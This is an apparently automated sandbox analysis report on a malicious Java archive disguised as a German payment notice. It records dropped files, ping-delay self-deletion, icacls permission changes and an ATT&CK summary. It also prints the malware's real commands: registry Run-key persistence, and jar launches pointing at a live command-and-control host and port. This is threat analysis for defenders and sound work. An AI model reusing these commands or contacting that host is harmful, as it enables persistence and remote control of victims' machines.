                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 23_2_02C3C477 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_64114F16 push es; retf
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_6410643C push eax; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_64106891 push ebx; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_641068CD push eax; ret
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_01FDB947 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_01FDB3B7 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_01FDBB67 push 00000000h; mov dword ptr [esp], esp
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_01FDA21B push ecx; ret

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeFile created: paexec.exe.3.drJump to dropped file
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeFile created: C:\Users\user\AppData\Local\Temp\lib\paexec.exeJump to dropped file
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeFile created: C:\Users\user\AppData\Local\Temp\systemhook-4400567111608641391.dllJump to dropped file
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeFile created: C:\Users\user\AppData\Local\Temp\systemhook+4014254877.dll (copy)Jump to dropped file
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lib\paexec.exeJump to dropped file
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\systemhook-4400567111608641391.dllJump to dropped file
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\systemhook+4014254877.dll (copy)Jump to dropped file
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeAPI coverage: 2.2 %
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                    Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                    Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                    Source: java.exe, 00000019.00000003.2309203726.000000001466E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
                    Source: java.exe, 00000019.00000003.2309203726.000000001466E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
                    Source: java.exe, 00000003.00000002.2470947427.000000000078B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 0000000C.00000002.1367264095.0000000001125000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000017.00000002.2303584809.0000000001184000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000019.00000002.2314002767.0000000000493000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Ljava/lang/VirtualMachineError;
                    Source: java.exe, 00000019.00000003.2309203726.000000001466E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
                    Source: java.exe, 00000017.00000002.2303584809.000000000115B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^M
                    Source: java.exe, 00000003.00000002.2470947427.000000000078B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 0000000C.00000002.1367264095.0000000001125000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000017.00000002.2303584809.0000000001184000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000019.00000002.2314002767.0000000000493000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cjava/lang/VirtualMachineError
                    Source: java.exe, 00000003.00000003.1208285185.0000000014865000.00000004.00000020.00020000.00000000.sdmp, java.exe, 0000000C.00000003.1353732583.000000001506D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000017.00000003.2302055736.000000001526A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000019.00000003.2309203726.000000001466E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
                    Source: java.exe, 00000003.00000002.2470947427.000000000078B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBn,f
                    Source: java.exe, 00000019.00000002.2317857862.000000006410C000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: KWNNC_NET_VMWARE 0x003f0000
                    Source: java.exe, 0000000C.00000002.1367264095.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000019.00000002.2314002767.000000000046B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_641013E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_641028BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_641028C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeMemory protected: page read and write | page guard
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 ""
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\dpapi.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 dpapi|dpapi.jar
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 off
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Avisierung vom 03.04.2025 Kundennummer 1084472 /d "\"C:\Program Files (x86)\Java\jre-1.8\bin\javaw\" -jar \"C:\Users\user\AppData\Roaming\Avisierung vom 03.04.2025 Kundennummer 1084472.jar\""
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping localhost -n 6 > nul && del "C:\Users\user\AppData\Local\Temp\Q80nzDuO6Y2mTZi9wfDuL.jar" /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 6
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c reg add hkcu\software\microsoft\windows\currentversion\run /v avisierung vom 03.04.2025 kundennummer 1084472 /d "\"c:\program files (x86)\java\jre-1.8\bin\javaw\" -jar \"c:\users\user\appdata\roaming\avisierung vom 03.04.2025 kundennummer 1084472.jar\""
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\software\microsoft\windows\currentversion\run /v avisierung vom 03.04.2025 kundennummer 1084472 /d "\"c:\program files (x86)\java\jre-1.8\bin\javaw\" -jar \"c:\users\user\appdata\roaming\avisierung vom 03.04.2025 kundennummer 1084472.jar\""
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c reg add hkcu\software\microsoft\windows\currentversion\run /v avisierung vom 03.04.2025 kundennummer 1084472 /d "\"c:\program files (x86)\java\jre-1.8\bin\javaw\" -jar \"c:\users\user\appdata\roaming\avisierung vom 03.04.2025 kundennummer 1084472.jar\""
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\software\microsoft\windows\currentversion\run /v avisierung vom 03.04.2025 kundennummer 1084472 /d "\"c:\program files (x86)\java\jre-1.8\bin\javaw\" -jar \"c:\users\user\appdata\roaming\avisierung vom 03.04.2025 kundennummer 1084472.jar\""
                    Source: java.exe, java.exe, 00000019.00000002.2317857862.000000006410C000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: DOF_PROGMAN 0x0001
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeCode function: 3_2_022A03C0 cpuid
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7728 VolumeInformation
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeQueries volume information: C:\Users\user\1967lock.file VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\5540 VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\2964 VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\4860 VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeQueries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeCode function: 25_2_64102810 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Command and Scripting Interpreter
                    1
                    Registry Run Keys / Startup Folder
                    12
                    Process Injection
                    1
                    Masquerading
                    21
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services21
                    Input Capture
                    1
                    Non-Standard Port
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API
                    1
                    Services File Permissions Weakness
                    1
                    Registry Run Keys / Startup Folder
                    1
                    Modify Registry
                    LSASS Memory1
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Services File Permissions Weakness
                    1
                    Disable or Modify Tools
                    Security Account Manager1
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading
                    12
                    Process Injection
                    NTDS1
                    Remote System Discovery
                    Distributed Component Object ModelInput Capture112
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA Secrets11
                    System Network Configuration Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Services File Permissions Weakness
                    Cached Domain Credentials23
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1656232 Sample: Avisierung vom 03.04.2025 K... Startdate: 04/04/2025 Architecture: WINDOWS Score: 84 71 jegjav.duckdns.org 2->71 73 ip-api.com 2->73 79 Malicious sample detected (through community Yara rule) 2->79 81 Sigma detected: Register Jar In Run Key 2->81 83 Exploit detected, runtime environment starts unknown processes 2->83 87 3 other signatures 2->87 9 java.exe 32 2->9         started        13 7za.exe 9 2->13         started        signatures3 85 Uses dynamic DNS services 71->85 process4 dnsIp5 75 jegjav.duckdns.org 128.90.145.126, 1967, 49716 PHMGMT-AS1US United States 9->75 77 ip-api.com 208.95.112.1, 49717, 80 TUT-ASUS United States 9->77 59 C:\Users\user\...\Q80nzDuO6Y2mTZi9wfDuL.jar, Java 9->59 dropped 61 C:\Users\user\...\7zgl6mWD4hExxxjOoeVcv.jar, Java 9->61 dropped 63 C:\Users\user\AppData\Local\...\paexec.exe, PE32 9->63 dropped 15 java.exe 4 9->15         started        18 java.exe 8 9->18         started        20 java.exe 3 9->20         started        24 2 other processes 9->24 22 conhost.exe 13->22         started        file6 process7 file8 65 Avisierung vom 03....nnummer 1084472.jar, Java 15->65 dropped 26 cmd.exe 1 15->26         started        29 cmd.exe 1 15->29         started        31 conhost.exe 15->31         started        67 C:\...\systemhook-4400567111608641391.dll, PE32 18->67 dropped 69 C:\Users\...\systemhook+4014254877.dll (copy), PE32 18->69 dropped 33 cmd.exe 1 18->33         started        35 cmd.exe 18->35         started        37 conhost.exe 18->37         started        39 conhost.exe 20->39         started        41 conhost.exe 24->41         started        process9 signatures10 89 Uses ping.exe to sleep 26->89 91 Uses ping.exe to check the status of other devices and networks 26->91 43 conhost.exe 26->43         started        45 reg.exe 1 26->45         started        47 conhost.exe 29->47         started        49 PING.EXE 1 29->49         started        51 conhost.exe 33->51         started        53 PING.EXE 1 33->53         started        55 conhost.exe 35->55         started        57 PING.EXE 1 35->57         started        process11

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Avisierung vom 03.04.2025 Kundennummer 1084472.jar3%VirustotalBrowse
                    Avisierung vom 03.04.2025 Kundennummer 1084472.jar11%ReversingLabsBinary.Trojan.Generic
                    SAMPLE100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\lib\paexec.exe5%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\systemhook+4014254877.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\systemhook-4400567111608641391.dll0%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://www.allatori.comu0%Avira URL Cloudsafe
                    http://www.allatori.como0%Avira URL Cloudsafe
                    http://www.allatori.com#0%Avira URL Cloudsafe
                    http://www.allatori.comdlly0%Avira URL Cloudsafe
                    https://www.poweradmin.com00%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    jegjav.duckdns.org
                    128.90.145.126
                    truetrue
                      unknown
                      ip-api.com
                      208.95.112.1
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://ip-api.com/json/false
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://java.oracle.com/java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 0000000C.00000002.1368038319.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000017.00000002.2304286299.0000000004E00000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000019.00000002.2315301733.00000000042B3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000019.00000002.2315301733.0000000004200000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://null.oracle.com/java.exe, 00000003.00000003.1566322429.0000000014FA3000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2475357557.0000000014FA3000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1363389065.0000000014F84000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1363515756.0000000014F8B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000002.2473312000.000000000999A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.1361967392.0000000014F7B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1362926264.0000000014F7B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1565520931.0000000014FA3000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000003.00000003.1363630443.0000000014F9C000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.allatori.comAvisierung vom 03.04.2025 Kundennummer 1084472.jar.12.drfalse
                                high
                                http://www.apache.org/licenses/jna-platform-5.5.0.jar.3.drfalse
                                  high
                                  http://www.allatori.com#java.exe, 00000019.00000002.2314002767.000000000046B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.allatori.comujava.exe, 00000003.00000002.2475357557.0000000014F93000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.allatori.comdlly7za.exe, 00000001.00000002.1205461171.00000000011C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.poweradmin.com0java.exe, 00000003.00000002.2472147643.0000000004FC4000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000003.00000003.2294556480.0000000015069000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://bugreport.sun.com/bugreport/java.exe, 00000019.00000002.2315301733.00000000042B3000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000019.00000002.2315301733.0000000004200000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.allatori.comojava.exe, 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.gnu.org/licenses/licenses.htmljava.exe, 00000003.00000003.1537919401.0000000015637000.00000004.00000020.00020000.00000000.sdmp, jna-platform-5.5.0.jar.3.drfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      208.95.112.1
                                      ip-api.comUnited States
                                      53334TUT-ASUSfalse
                                      128.90.145.126
                                      jegjav.duckdns.orgUnited States
                                      22363PHMGMT-AS1UStrue
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1656232
                                      Start date and time:2025-04-04 06:59:05 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 58s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Cookbook file name:defaultwindowsfilecookbook.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Without Tracing
                                      Number of analysed new started processes analysed:34
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Avisierung vom 03.04.2025 Kundennummer 1084472.jar
                                      Detection:MAL
                                      Classification:mal84.troj.expl.evad.winJAR@36/25@5/2
                                      EGA Information:
                                      • Successful, ratio: 25%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .jar
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • TCP Packets have been reduced to 100
                                      • Excluded IPs from analysis (whitelisted): 23.204.23.20, 204.79.197.222, 4.245.163.56
                                      • Excluded domains from analysis (whitelisted): fp.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target java.exe, PID 2964 because it is empty
                                      • Execution Graph export aborted for target java.exe, PID 5540 because it is empty
                                      • Execution Graph export aborted for target java.exe, PID 7728 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing network information.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • Report size getting too big, too many NtWriteFile calls found.
                                      No simulations
                                      No context
                                      No context
                                      No context
                                      No context
                                      No context
                                      Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
